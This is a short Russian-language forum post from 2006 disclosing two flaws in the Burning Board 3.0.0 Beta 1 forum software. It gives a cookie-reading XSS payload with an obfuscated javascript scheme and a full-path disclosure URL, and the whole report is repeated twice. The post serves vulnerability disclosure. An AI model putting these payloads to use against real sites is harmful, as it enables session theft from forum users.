Goudini
14.12.2006, 22:31
Вот что я надыбал в Burning Board 3.0.0 Beta 1 (http://beta.woltlab.de/download_en.html)
1. Активная XSS прямо в сообщении
javascript:alert(document.cookie)
заменяеться на
<img src="java&*#115;cript:alert(document.cookie)" class="resizeImage" alt="" />
и куки у нас в алерте :)
2. Раскрытие пути
При подстановке неверного значения в переменную $_GET["page"] выдаеться сообщение об ошибке
index.php?page=Bugaga
Можно узнать полный путь к форуму
1. Активная XSS прямо в сообщении
javascript:alert(document.cookie)
заменяеться на
<img src="java&*#115;cript:alert(document.cookie)" class="resizeImage" alt="" />
и куки у нас в алерте :)
2. Раскрытие пути
При подстановке неверного значения в переменную $_GET["page"] выдаеться сообщение об ошибке
index.php?page=Bugaga
Можно узнать полный путь к форуму